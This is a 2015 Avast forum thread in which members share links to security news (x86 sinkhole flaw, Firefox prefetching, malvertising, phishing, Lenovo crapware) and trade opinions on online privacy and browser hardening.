https://forum.avast.com/index.php?topic=52252.msg1241022#msg1241022 (https://forum.avast.com/index.php?topic=52252.msg1241022#msg1241022)
-
Hi bob3160,
Sorry for the doublure on the firefox update, now no-one can say they haven't seen it. The second one is new here.
Damian
-
http://www.bit-tech.net/news/hardware/2015/08/07/x86-security-flaw/1
https://www.blackhat.com/docs/us-15/materials/us-15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation-wp.pdf
https://www.blackhat.com/docs/us-15/materials/us-15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation.pdf
https://github.com/xoreaxeaxeax/sinkhole
:o ::) :-\ :'(
0day in hardware for 20 years ;)
-
Hi Dwarden,
And who would profit from a 20 year existing zero day?
Answer the questions and you know why they sit on most backdoors that long
and why lots of protocols stay holed, flawed, degraded in many ways for years
and even come under export restrictions?
polonus
-
Stagefright Detector Detects if Your Phone Is Vulnerable to Stagefright
http://lifehacker.com/stagefright-detector-detects-if-your-phone-is-vulnerabl-1722662061
-
Google Is Now Alphabet. Here’s Why It Had to Evolve.
http://www.slate.com/blogs/future_tense/2015/08/10/google_becomes_alphabet_page_brin_form_new_company_pichai_new_google_ceo.html
-
Sony not ready for Windows10 transition: http://www.sony.co.uk/support/en/windows10
polonus
-
Google Is Now Alphabet. Here’s Why It Had to Evolve.
http://www.slate.com/blogs/future_tense/2015/08/10/google_becomes_alphabet_page_brin_form_new_company_pichai_new_google_ceo.html (http://www.slate.com/blogs/future_tense/2015/08/10/google_becomes_alphabet_page_brin_form_new_company_pichai_new_google_ceo.html)
Google is still Google but Google is now a subsidiary of Alphabet.
-
Watch out for Costly Mobile Ads
https://blog.malwarebytes.org/online-security/2015/08/watch-out-for-costly-mobile-ads/?utm_source=Gplus&utm_medium=social
New Firefox Zero-Day: Patch Now! (UPDATED) (Updated August 11, 2015)
https://blog.malwarebytes.org/zero-days/2015/08/new-firefox-zero-day-patch-now/?utm_source=Gplus&utm_medium=social
-
Hacking a Tesla Model S: What we found and what we learned
https://blog.lookout.com/blog/2015/08/07/hacking-a-tesla/
-
Watson to Gain Ability to “See”
http://www-03.ibm.com/press/us/en/pressrelease/47435.wss
HAL 9000 https://en.wikipedia.org/wiki/HAL_9000
-
Lenovo installed BIOS-rootkit on laptops: : http://thenextweb.com/insider/2015/08/12/lenovo-used-a-hidden-windows-feature-to-ensure-its-software-could-not-be-deleted/
polonus
-
Facebook urged to tighten privacy settings after harvest of user data
http://www.theguardian.com/technology/2015/aug/09/facebook-privacy-settings-users-mobile-phone-number
-
New SMiShing Campaign Targets T-Mobile Subscribers
https://blog.malwarebytes.org/fraud-scam/2015/08/new-smishing-campaign-targets-t-mobile-subscribers/?utm_source=Gplus&utm_medium=social
FAQs about Mac Adware
https://www.malwarebytes.org/articles/faqs-about-mac-adware/?utm_source=Gplus&utm_medium=social
My Conversations with Cybersecurity Influencers
https://blog.malwarebytes.org/conferences/2015/08/my-conversations-with-cybersecurity-influencers/?utm_source=Gplus&utm_medium=social
Websites Hacked Via Website Backups
https://blog.sucuri.net/2015/06/websites-hacked-via-website-backups.html?utm_campaign=Websites%20Hacked%20Via%20Website%20Backups%20Blogpost&utm_medium=social&utm_source=googleplus
Steam IM Spam Leads to Fake Imgur Site, Malware
https://blog.malwarebytes.org/fraud-scam/2015/08/steam-im-spam-leads-to-fake-imgur-site-malware/?utm_source=Gplus&utm_medium=social
SSL Malvertising Campaign Continues
https://blog.malwarebytes.org/malvertising-2/2015/08/ssl-malvertising-campaign-continues/?utm_source=Gplus&utm_medium=social
The Noise Around You Could Strengthen Your Passwords
http://www.wired.com/2015/08/noise-around-strengthen-passwords/
-
Eurocentric Ransomware Spam in Circulation
https://blog.malwarebytes.org/fraud-scam/2015/08/eurocentric-ransomware-spam-in-circulation/?utm_source=Gplus&utm_medium=social
Outbrowse and other bundlers
https://blog.malwarebytes.org/security-threat/2015/08/outbrowse-and-other-bundlers/?utm_source=Gplus&utm_medium=social (Another reason to always do custom installs and read each screen carefully.)
-
MRG Effitas Online Banking/Browser Security Q2 2015
Saw this on Wilders Forum
http://www.wilderssecurity.com/threads/mrg-effitas-online-banking-browser-security-q2-2015.378862/ (http://www.wilderssecurity.com/threads/mrg-effitas-online-banking-browser-security-q2-2015.378862/)
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
Thanks, but I already fixed this in Firefox, Cyberfox and Pale Moon.
http://www.ghacks.net/2015/08/16/block-firefox-from-connecting-to-sites-when-you-hover-over-links/
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
Thanks for sharing that Essex. Applied. :)
-
Firefox users exercise caution http://betanews.com/2015/08/15/firefox-stealthily-loads-webpages-when-you-hover-over-links-heres-how-to-stop-it/
This pre-fetching has been going on for years (not just in firefox) in the days of mass dial-up users, disabled by me. It used to be more than just hovering over a link that was prefetched. If you visited a page, you didn't even have to hover over a link, links in that page could be pre-fetched right away.
Check for 'prefetch' without the quotes in about:config and you will see and prefetch settings (including the old settings) depending on what add-ons that you have there may well be prefetch settings for those.
I think that mow we are in a mass broadband environment, you would think that pre-fetching would be dead and buried and not reinvigorated.
-
Firefox users that use their browser a la default are at risk when they use their browser to read webmail and on other occasions like here in this very thread: http://slashdot.org/story/15/08/14/2321202/how-to-quash-firefoxs-silent-requests
"This can be used to instantly identify a user using a site's private messaging feature, or identify users viewing a thread in a web forum."
Feature can be stopped in about:config: https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_speculative-pre-connections
It is a sad thing that users should intervene more and more to protect the last tiny bit of digital privacy,
and most now are completely out on their own. So better have this at the back of your heads - on the Interwebs you are continuously being tracked and traced. Do not put out there anything you do not want to be completely "out in the open".
polonus
-
Firefox users that use their browser a la default are at risk when they use their browser to read webmail and on other occasions like here in this very thread: http://slashdot.org/story/15/08/14/2321202/how-to-quash-firefoxs-silent-requests (http://slashdot.org/story/15/08/14/2321202/how-to-quash-firefoxs-silent-requests)
"This can be used to instantly identify a user using a site's private messaging feature, or identify users viewing a thread in a web forum."
Feature can be stopped in about:config: https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_speculative-pre-connections (https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_speculative-pre-connections)
It is a sad thing that users should intervene more and more to protect the last tiny bit of digital privacy,
and most now are completely out on their own. So better have this at the back of your heads - on the Interwebs you are continuously being tracked and traced. Do not put out there anything you do not want to be completely "out in the open".
polonus
One should never "put something out there" that one doesn't expect every one to have access to.
It makes no difference it this information is published in a forum, a chat, private or otherwise, a blog or any other method of publishing.
It also doesn't matter what browser or other means you use to put out this information. If it's on the internet, consider it public.
You may attempt, through various means, to conceal the information but ultimately, you can not hide the information.
There is no privacy on the internet.
-
Hi bob3160,
The browser tweaking list gets longer and longer and all this has been decided for us by others for and for the greater part well over our heads and also mostly as they say "for our own good" and we all agreed to all that by starting to use the technology. What has remained of that so-called "land of the free" we still used to know?
Damian
-
Hi bob3160,
The browser tweaking list gets longer and longer and all this has been decided for us by others for and for the greater part well over our heads and also mostly as they say "for our own good" and we all agreed to all that by starting to use the technology. What has remained of that so-called "land of the free" we still used to know?
Damian
All the tweaking in the world still can't make you hide or become invisible.
It can only make finding you more difficult. :(
When you consider that the AT&T (http://www.zdnet.com/article/att-phone-provider-tapped-networks-helped-nsa/) and other large companies whose services most people use,
help the NSA spy on millions of Americans calls and email. In the US, it's the NSA but all countries have the same types of agencies that do the same things to their citizens.
Hiding becomes totally impossible.
-
Hi bob3160,
So everyone everywhere should always remember what is shown as attached (happens) :o
polonus
-
from 2010 but interesting read https://securelist.com/blog/opinions/30611/on-the-way-to-better-testing/
-
A Week in Security (Aug 09 – Aug 15)
https://blog.malwarebytes.org/online-security/2015/08/a-week-in-security-aug-09-aug-15/?utm_source=Gplus&utm_medium=social
The Multi-language Tech Support Scam is Here
https://blog.malwarebytes.org/fraud-scam/2015/08/the-multi-language-tech-support-scam-is-here/?utm_source=Gplus&utm_medium=social
-
Expensive service blocked competitors to encash 80 dollars a day: https://www.fcc.gov/document/fcc-fines-smart-city-750k-blocking-wi-fi-0
polonus
-
MS Emergency patch released: http://blogs.technet.com/b/msrc/archive/2015/08/18/out-of-band-release-for-security-bulletin-ms15-093.aspx
pol
-
How to Protect Your School Computer
https://www.malwarebytes.org/articles/how-to-protect-your-school-computer/?utm_source=Gplus&utm_medium=social
“Crucial Reference” 419 Spam
https://blog.malwarebytes.org/fraud-scam/2015/08/crucial-reference-419-spam/
Wigo Means Bingo for Blackseo Agent
https://blog.sucuri.net/2015/08/wigo-means-bingo-for-blackseo-agent.html?utm_campaign=Wigo%20Means%20Bingo%20for%20Blackseo%20Agent%20Blogpost&utm_medium=social&utm_source=googleplus
My Website Was Blacklisted By Google and Distributing Email Spam
https://blog.sucuri.net/2015/04/my-website-was-blacklisted-by-google-and-distributing-email-spam.html?utm_campaign=My%20Website%20Was%20Blacklisted%20By%20Google%20and%20Distributing%20Email%20Spam%20Blogpost&utm_medium=social&utm_source=googleplus
-
Adware changes ABP settings, AdBlocker Plus exploit puts OSX users at risk: http://www.webroot.com/blog/2015/08/19/adblocker-plus-puts-osx-at-risk/
polonus
-
IE Under Attack! Microsoft Releases Emergency Out-of-Band Patch
http://www.tripwire.com/state-of-security/vulnerability-management/ie-under-attack-microsoft-releases-emergency-out-of-band-patch/
Time’s Up! – Ashley Madison Data Released
https://blog.malwarebytes.org/hacking-2/2015/08/for-sign-off-times-up-ashley-madison-data-released/
Scam Banking on Roller Coaster Disaster Seen in the Wild
https://blog.malwarebytes.org/fraud-scam/2015/08/scam-banking-on-roller-coaster-disaster-seen-in-the-wild/
-
Spotify wants to spy on you: http://libertyblitzkrieg.com/2015/08/20/youve-been-warned-spotify-wants-to-spy-on-you-in-every-way-imaginable/
polonus
-
Spotify wants to spy on you: http://libertyblitzkrieg.com/2015/08/20/youve-been-warned-spotify-wants-to-spy-on-you-in-every-way-imaginable/ (http://libertyblitzkrieg.com/2015/08/20/youve-been-warned-spotify-wants-to-spy-on-you-in-every-way-imaginable/)
polonus
It can't spy on you if you don't have it installed. :)
-
IE Under Attack! Microsoft Releases Emergency Out-of-Band Patch
http://www.tripwire.com/state-of-security/vulnerability-management/ie-under-attack-microsoft-releases-emergency-out-of-band-patch/
lol
If my memory serves me, Seems like IE has been under attack since forever.
-
Exploring a “Malwarebytes Anti-Malware for Windows 10” website…
https://blog.malwarebytes.org/online-security/2015/08/exploring-an-mbam-for-windows-10-website/
Round 2 – Impact Team vs. Ashley Madison
https://blog.malwarebytes.org/hacking-2/2015/08/round-2-impact-team-vs-ashley-madison/
Telstra Media’s Homepage Pushes Malvertising
https://blog.malwarebytes.org/news/2015/08/telstra-medias-homepage-pushes-malvertising/
Stranger Danger and the Sociable Child
https://blog.malwarebytes.org/online-security/2015/08/stranger-danger-and-the-sociable-child/
Malvertising Hits Online Dating Site PlentyOfFish
https://blog.malwarebytes.org/malvertising-2/2015/08/malvertising-hits-online-dating-site-plentyoffish/
@ schmidthouse +1 Edge will be next.
-
How internet started .... Old news but some may be interested
ARPANET https://en.m.wikipedia.org/wiki/ARPANET
First contry connected outside US
www.paleofuture.gizmodo.com/the-secret-project-to-turn-the-internet-into-an-anti-so-1724555107
www.norsar.no/norsar/about-us/History/Internet/
-
Thousands of WP sites hacked spreading malware: http://research.zscaler.com/2015/08/neutrino-campaign-leveraging-wordpress.html
polonus
-
Ongoing security problem - public FTP servers: http://findex.cedsys.nl/research/mass-ftp-crawling/
link author: Sander Ferdinand
polonus
-
Torrent Trackers ban Windows 10 clients: https://torrentfreak.com/torrent-trackers-ban-windows-10-over-privacy-concerns-150822/
Why? Read: http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229
polonus
-
Torrent Trackers ban Windows 10 clients: https://torrentfreak.com/torrent-trackers-ban-windows-10-over-privacy-concerns-150822/ (https://torrentfreak.com/torrent-trackers-ban-windows-10-over-privacy-concerns-150822/)
Why? Read: http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229 (http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229)
polonus
Sorry Damien but your Why isn't correct.
Torrents are afraid of the fact that some of their cracked software might be spotted.
-
A Week in Security (Aug 16 – Aug 22)
https://blog.malwarebytes.org/online-security/2015/08/a-week-in-security-aug-16-aug-22/
Phishing Tale: An Analysis of an Email Phishing Scam
https://blog.sucuri.net/2014/06/phishing-tale-an-analysis-of-an-email-phishing-scam.html?utm_campaign=Phishing%20Tale%3A%20An%20Analysis%20of%20an%20Email%20Phishing%20Scam%20Blogpost&utm_medium=social&utm_source=googleplus
Your Website Hacked but No Signs of Infection
https://blog.sucuri.net/2015/06/your-website-hacked-but-no-signs-of-infection.html?utm_campaign=Your%20Website%20Hacked%20but%20No%20Signs%20of%20Infection%20Blogpost&utm_medium=social&utm_source=googleplus
-
Thousands of sites with EV-SSL Certificates wrongly presented in Google Chrome:
see: http://news.netcraft.com/archives/2015/08/24/thousands-short-changed-by-ev-certificates-that-dont-display-correctly-in-chrome.html
polonus
-
Thousands of sites with EV-SSL Certificates wrongly presented in Google Chrome:
see: http://news.netcraft.com/archives/2015/08/24/thousands-short-changed-by-ev-certificates-that-dont-display-correctly-in-chrome.html (http://news.netcraft.com/archives/2015/08/24/thousands-short-changed-by-ev-certificates-that-dont-display-correctly-in-chrome.html)
polonus
Interesting.
"Comodo is the CA most affected by the May 2015 policy update, with almost 6,000 EV certificates at risk if Google's new policy is applied from 1st Jan 2015.
Comodo has recently issued certificates with SCTs from too few independent logs: for example,
Comodo issued a certificate on 3rd August 2015 that is missing a non-Google SCT."
-
Instagram Follower Booster Leads to SMS Browser Extension PUP
https://blog.malwarebytes.org/online-security/2015/08/instagram-follower-booster-leads-to-sms-browser-extension-pup/
-
Privacy worse than in fictional "1984": http://www.theguardian.com/world/2015/aug/24/we-need-geneva-convention-for-the-internet-says-new-un-privacy-chief
It almost seems that smartphones were created with data and privacy breach at mind, in these respects the technology is a total fail:
http://www.upenn.edu/computing/security/checklists/Top10/Top_10_Tips_for_Smartphones.php
As ad-monitoring and launching came to ruin the last vestiges of privacy protection the end-user is left in the cold with a take-it or leaave-it situation. A great example was the banning of adblock apps by Google on their Android OS, a measure that also blocked the user from ways to protect against malvertising and this could be seen as a compromittal of user-security. Here we see a monopolistic versus end-user conflict, where the monopolist can no longer guarantee neither "any" privacy nor the end-user's security against malware. This is a sad situation.
polonus
-
AT&T hotsports injects adware into your Wifi traffic.
This borders on malvertising practices, hotspot sprouting ads is highly controversial:
http://webpolicy.org/2015/08/25/att-hotspots-now-with-advertising-injection/
link article author = Jonathan Mayer
polonus
-
AT&T hotsports injects adware into your Wifi traffic.
This borders on malvertising practices, hotspot sprouting ads is highly controversial:
http://webpolicy.org/2015/08/25/att-hotspots-now-with-advertising-injection/ (http://webpolicy.org/2015/08/25/att-hotspots-now-with-advertising-injection/)
link article author = Jonathan Mayer
polonus
Is the hotspot Free ??? Are there alternatives ???
-
If that is the way they want to enrich the user's experience, I would say no thank you.
With Open Wifi you'd get the normal ads, understandable, not additonals where you would not expect them to pop-up.,
and cannot you reckon on Google to block injected ads?
Well they started to kill the noisy ones now from their browser.
Another topic.
Some intern you would not like to hire for sure:
http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/
polonus
-
If that is the way they want to enrich the user's experience, I would say no thank you.
With Open Wifi you'd get the normal ads, understandable, not additonals where you would not expect them to pop-up.,
and cannot you reckon on Google to block injected ads?
Well they started to kill the noisy ones now from their browser.
Another topic.
Some intern you would not like to hire for sure:
http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/ (http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/)
polonus
Fire-eye did fire him. :)
-
If that is the way they want to enrich the user's experience, I would say no thank you.
With Open Wifi you'd get the normal ads, understandable, not additonals where you would not expect them to pop-up.,
and cannot you reckon on Google to block injected ads?
Well they started to kill the noisy ones now from their browser.
Another topic.
Some intern you would not like to hire for sure:
http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/ (http://money.cnn.com/2015/07/15/technology/hacker-fireeye-intern/)
polonus
Fire-eye did fire him. :)
AND that exceptional talent/knowledge could have been put to honest use/ wrong choice. :-\
-
Hi schmidthouse,
Some choose the left-hand path nevertheless, and then some get found out. In the light of the above news- Tor no longer completely safe as criminal safehaven, illegal marketplace Agora decides to momentarily interrupt their present illegal operations because of a hidden-tor flaw: read:
http://pastebin.com/7AVDGVpV (posted by Agora moderation).
because of this tor-vulnerability: https://news.mit.edu/2015/tor-vulnerability-0729
So g33ks that choose for the dark side of the Interwebs also have their problems, not only we, the good upfront guys.
Nothing is what it seemed anymore - "Nacht und Nebel" -"The truth is out there somehow" ;)
polonus
-
(https://lh3.googleusercontent.com/proxy/ZeNZ6Abpf51HbciPSit0jfngFvHbJBeVb_9cJe_CVNdUZmXHTWTNeUyVDhLw8d5xTtQ5WeNKTEDszBkOqG-ryL08essCspLYUA1W=w506-h311)
Starting 9/1/2016 Google will block Flash Ads by default.
Flash will be out, HTML 5 will be taking it's place.
https://plus.google.com/+GoogleAds/posts/2PmwKinJ7nj (https://plus.google.com/+GoogleAds/posts/2PmwKinJ7nj)
-
Browsefox variant High Stairs
https://blog.malwarebytes.org/security-threat/2015/08/browsefox-variant-high-stairs/
“Rewards” Page Promises Discount for Your PUP Purchase
https://blog.malwarebytes.org/fraud-scam/2015/08/rewards-page-promises-discount-for-your-pup-purchase/
Angler Exploit Kit Strikes on MSN.com via Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2015/08/angler-exploit-kit-strikes-on-msn-com-via-malvertising-campaign/
-
Just stumbled upon this via scanning for my "virus & worms" postings: -> https://forum.avast.com/index.php?topic=175770.0
Apart from some SEO experts, no one really seems to care for this kind of manipulation and abuse and even Google seems to turn a blind eye, allthough they must have been aware a lot of this is going on. If not negative SEO then certainly manipulation is going on: https://managewp.com/is-wordpress-seo-by-yoast-broken article author = Tom Ewer.
polonus
-
Login credentials for 225,000 Apple customers stolen, leaked online
http://www.news.com.au/technology/online/login-credentials-for-225000-apple-customers-stolen-leaked-online/story-fnjwnj25-1227508036288
-
Genieo installer tricks keychain
https://blog.malwarebytes.org/mac/2015/08/genieo-installer-tricks-keychain/?utm_source=Gplus&utm_medium=social
-
New Spear Phishing Campaign Pretends to be EFF
https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff
-
TLDs you'd better shun or block: https://www.bluecoat.com/company/press-releases/blue-coat-reveals-webs-shadiest-neighborhoods
polonus
-
Cybercrooks quickly bypass Adobe Flash Player's improved security protections
http://www.networkworld.com/article/2978860/microsoft-subnet/cybercrooks-quickly-bypass-adobe-flash-players-improved-security-protections.html
-
“Reply to Scammers”, they said. “It’ll be fun”, they said
https://blog.malwarebytes.org/online-security/2015/09/reply-to-scammers-they-said-itll-be-fun-they-said/?utm_source=Gplus&utm_medium=social
Shopperz alters dnsapi.dll
https://blog.malwarebytes.org/intelligence/2015/09/shopperz-alters-dnsapi-dll/?utm_source=Gplus&utm_medium=social
-
Study shows trackers making websites load dead-slow - you want to go back to a dial-up experiece? : https://labsblog.f-secure.com/2015/09/01/trackers-are-out-of-control/
article author = Sean Sullivan.
pol
-
We dont need a rebirth of Dial-Up, i know how that connection feels like and
i dont want it back of course :)
-
Start killing trackers then from the websites you visit.
Well you know the formula ;) block ads, scripts, trackers with the appropriate extensions/add-ons.
pol
-
Im blocking trackers via Avast AOS Plugin, maybe ill add more soon :)
-
New PCs with crapware (added trial software etc.) with an average of 20 additional programs slows down your new computer big time.
(Spotify, dropbox etc.). Computers that are so-called signature PCs will start 104% faster. Read: http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.69916600
polonus
-
New PCs with crapware (added trial software etc.) with an average of 20 additional programs slows down your new computer big time.
(Spotify, dropbox etc.). Computers that are so-called signature PCs will start 104% faster. Read: http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.69916600 (http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.69916600)
polonus
Nice but at a price. If you're willing to spend the time and effort, order direct from the Manufacturer and insist on a "clean" computer.
It isn't easy but it can be done and the price will be cheaper. :) Or,
clean up the computer after you buy it before you start to add anything else.
Slim Computers (http://slimcomputer.com/) can help in the cleanup.
-
Thanks, bob3160, for that cleansing tip. I sure gonna do that on a lenovo laptop now right after install.
As long as it isn't a permanent problem, it isn't that bad really.
Know some wrestle with slow computers and do not know what to fasten them up a bit,
but that aside, I hope those that go a laptop as a present before going to school recently know what to do now,
well that is for the responsible lot among them, the others only will slow them up further. ;)
Damian
-
Another topic that's a part of my current presentation. :)
There's a lot more to the presentation than converting folks to Avast. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1441375197930-97458.png)
https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
-
Thanks, bob3160, for that cleansing tip. I sure gonna do that on a lenovo laptop now right after install.
As long as it isn't a permanent problem, it isn't that bad really.
<snip>
Well Lenovo are on their second strike with crapware that has a security implication.
They now have shot themselves in both feet and haven't got a leg to stand on.
I had been looking at a new laptop and Lenovo were generally good value for money, but just the first security nightmare was enough for me to rule out Lenovo in my plans. Trust is something that is hard to build up and so easy to lose.
-
I'm still happy with my Lenovo but I got rid of the crap before it ever got exposed to the net. :)
-
Steer Clear of this Skype Spam
https://blog.malwarebytes.org/fraud-scam/2015/09/steer-clear-of-this-skype-spam/?utm_source=Gplus&utm_medium=social (This is what happens when you use the most famous VoIP)
“Free Games” App Needs a Power Up
https://blog.malwarebytes.org/online-security/2015/09/free-games-app-needs-a-power-up/?utm_source=Gplus&utm_medium=social
-
Millions of WordPress websites vulnerable to hackers.
Heimdahl warns: https://heimdalsecurity.com/blog/security-alert-ransomware-legitimate-websites-compromised-script-injection/
article author = Anra Zaharia.
pol
-
Norse Pirate Party starts new DNS-service: https://www.piratpartiet.no/2015/09/piratpartiet-setter-opp-apen-dns-server-ny-gratistjeneste-mot-nettsensur/ & https://www.piratpartiet.no/dns/
Re: http://toolbar.netcraft.com/site_report?url=http://185.56.187.149
Netcraft Risk Rating 5:10 facilitated via Zetta I.O. Big Norwegion Cloud-data Player.
http://toolbar.netcraft.com/site_report?url=http://149-187-56.185.c.no-osl1.zetta.io (:53)
polonus
-
Gozi Trojan financial web injection hacker pleads guilty
http://www.scmagazineuk.com/gozi-trojan-financial-web-injection-hacker-pleads-guilty/article/437201/
Avoid this BSoD Tech Support Scam
https://blog.malwarebytes.org/fraud-scam/2015/09/avoid-this-bsod-tech-support-scam/?utm_source=Gplus&utm_medium=social
Malicious Google Search Console Verifications
https://blog.sucuri.net/2015/09/malicious-google-search-console-verifications.html?utm_campaign=Malicious%20Google%20Search%20Console%20Verifications%20Blogpost&utm_medium=social&utm_source=googleplus
Com[dot]com Site Leads to Fake Daily Mail Article, Other Dodgy Sites
https://blog.malwarebytes.org/fraud-scam/2015/09/comdotcom-site-leads-to-fake-daily-mail-article-other-dodgy-sites/?utm_source=Gplus&utm_medium=social
Ashley Madison's Leaked Top 20 Passwords Are All Really, Really Stupid
(News alert: always use your brain when creating passwords.) (Check strength of passwords here https://howsecureismypassword.net/)
https://www.distractify.com/mykafox-everyone-out-of-the-monkey-house-1337355706.html
MGS V: The Phantom Game Downloader
https://blog.malwarebytes.org/online-security/2015/09/mgs-v-the-phantom-game-downloader/?utm_source=facebook&utm_medium=social
Thousands of Hacked Sites Lead to Offer of Famous Spy Software
https://blog.malwarebytes.org/online-security/2015/09/thousands-of-hacked-sites-lead-to-offer-of-famous-spy-software/?utm_source=Gplus&utm_medium=social
-
Google already had 300.000 complaints about Ad Injection, a growing problem;
read: http://research.google.com/pubs/pub43346.html
That is why polonus thinks a decent adblocker like uBlock or Adguard
or surfing via an adblocking Android browser app is a must
for every user that has online security at heart.
Ad Injection could off-course also mean Malware Injection!
Google Safebrowsing is only a last line of defense here.
polonus
-
Anonymous browsing effort is not appreciated by DHS authorities to say the least:
https://www.propublica.org/article/library-support-anonymous-internet-browsing-effort-stops-after-dhs-email
Where people would stronly protest just a generation ago we now get general ignorance
and an empty gaze as reaction where privacy is concerned. :(
Re: https://www.reddit.com/r/TOR/comments/3kf0ss/first_library_to_support_anonymous_internet/
polonus
-
Mozilla postpones Firefox add-on signing enforcement
http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/
-
Mozilla postpones Firefox add-on signing enforcement
http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/ (http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/)
It probably cost them too many users....
-
Obfuscated URLs, where is that link taking you?
https://blog.malwarebytes.org/fraud-scam/2015/09/obfuscated-urls-where-is-that-link-taking-you/?utm_source=Gplus&utm_medium=social
-
Mozilla postpones Firefox add-on signing enforcement
http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/ (http://www.ghacks.net/2015/09/11/mozilla-postpones-firefox-add-on-signing-enforcement/)
It probably cost them too many users....
I honestly couldn't believe they could be that stupid surely their alpha and nightly users would have let them know this was a huge error.
Thankfully they have seen the error of their ways.
-
Hi DavidR,
Still hope Avast will sign AOS add-on (as they said they would with fx version 41) as signing software is always generally speaking a good practice. DrWeb's also signed their extension for that matter.
Damian
-
Too many things goeing wrong at FireEye's lately ::): http://www.theregister.co.uk/2015/09/08/fireeye_0day/
Re: https://www.insinuator.net/2015/09/sending-mixed-signals-what-can-happen-in-the-course-of-vulnerability-disclosure/
FireEye reacted that propriety software secrets were revealed by these German info security researchers.
Question of money or a lack of knowledgable expertise, e.g. surplus of generically educated IT staff,
but a lack of technical IT specialists, and that is obvious through recent major security incidents
(data breaches, compromittal, insecure practices, general incompetence)?
polonus
-
Big threat still: https://www.theprivacyblog.com/uncategorized/unauthorized-ssl-certificates-put-everyone-at-risk/
and read: http://arstechnica.com/security/2015/03/bogus-ssl-certificate-for-windows-live-could-allow-man-in-the-middle-hacks/
polonus
-
You certainly want a datingsite to be encrypted, but often it is not: https://www.eff.org/deeplinks/2012/02/six-heartbreaking-truths-about-online-dating-privacy
polonus
-
“YellowSend, send your large files for free?”
https://blog.malwarebytes.org/security-threat/2015/09/yellowsend-send-your-large-files-for-free/?utm_source=Gplus&utm_medium=social
Beware of Sites Claiming to House “Gifts for My Subs”…
https://blog.malwarebytes.org/fraud-scam/2015/09/beware-of-sites-claiming-to-house-gifts-for-my-subs/?utm_source=Gplus&utm_medium=social
-
Mal-ad campaign goes on almost unnoticed for weeksand weeks with Angler exploit redirects, 139 million monthly British eBay visitors were at risk :o.
Read: https://blog.malwarebytes.org/malvertising-2/2015/09/large-malvertising-campaign-goes-almost-undetected/
So, my dear Avast friends, polonus will I keep his adblocker with special subscription lists up and running.
polonus
-
Avoid This HMRC Tax Refund Phish
https://blog.malwarebytes.org/fraud-scam/2015/09/avoid-this-hmrc-tax-refund-phish/?utm_source=Gplus&utm_medium=social
-
Avoid This HMRC Tax Refund Phish
https://blog.malwarebytes.org/fraud-scam/2015/09/avoid-this-hmrc-tax-refund-phish/?utm_source=Gplus&utm_medium=social
This (and others) have been doing the rounds for some considerable time now.
-
Corrupted Firmware on hacked Cisco-Routers detected: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
The routers were backdoored to be able compromise several modules.
Link article authors: FireEye Threat Research's By Bill Hau and Tony Lee.
polonus
-
Large Malvertising Campaign Goes (Almost) Undetected
https://blog.malwarebytes.org/malvertising-2/2015/09/large-malvertising-campaign-goes-almost-undetected/?utm_source=Gplus&utm_medium=social
Don’t Get Stuck on WhatsApp Stickers…
https://blog.malwarebytes.org/fraud-scam/2015/09/dont-get-stuck-on-whatsapp-stickers/?utm_source=Gplus&utm_medium=social
What's the difference between antivirus and anti-malware?
https://www.malwarebytes.org/articles/antivirus-vs-antimalware/?utm_source=Gplus&utm_medium=social
Fake Amazon UK Mail Asks You to Verify Your Account After “Breach”
https://blog.malwarebytes.org/fraud-scam/2015/09/fake-amazon-uk-mail-asks-you-to-verify-your-account-after-breach/?utm_source=Gplus&utm_medium=social
-
Phishing Attempt - Caution!
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442519831732-80450.png)
If you look at the detailed senders address carefully, you should see this didn't really come from Wells Fargo.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442520055375-83247.png)
The spelling and grammar has gotten much better and more convincing.
However, if you hover your mouse over the included "signon" link you'll notice it doesn't go to Wells Fargo:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442520165797-29693.png)
This is a sure sign of a Phishing attempt. Don't be the fool that falls for it. Stay vigilant and be suspicious any time
you receive something like this from your bank or other type of financial institution.
Never click on included link. If you aren't sure, take the initiative and, contact your financial institution on your own.
-
Thousands and thousands of hacked WordPress sites are spreading malware, read here: https://blog.sucuri.net/2015/09/wordpress-malware-active-visitortracker-campaign.html article author is Sucuri's Daniel Cid.
Attackers seems to use leaks in WP plug-ins. WP websites often haven't updated to the latests CMS software versions,
plug-ins can be outdated and themes can have vulnerable code. To check your security with a quick and dirty cold reconnaissance scan go here: https://hackertarget.com/wordpress-security-scan/
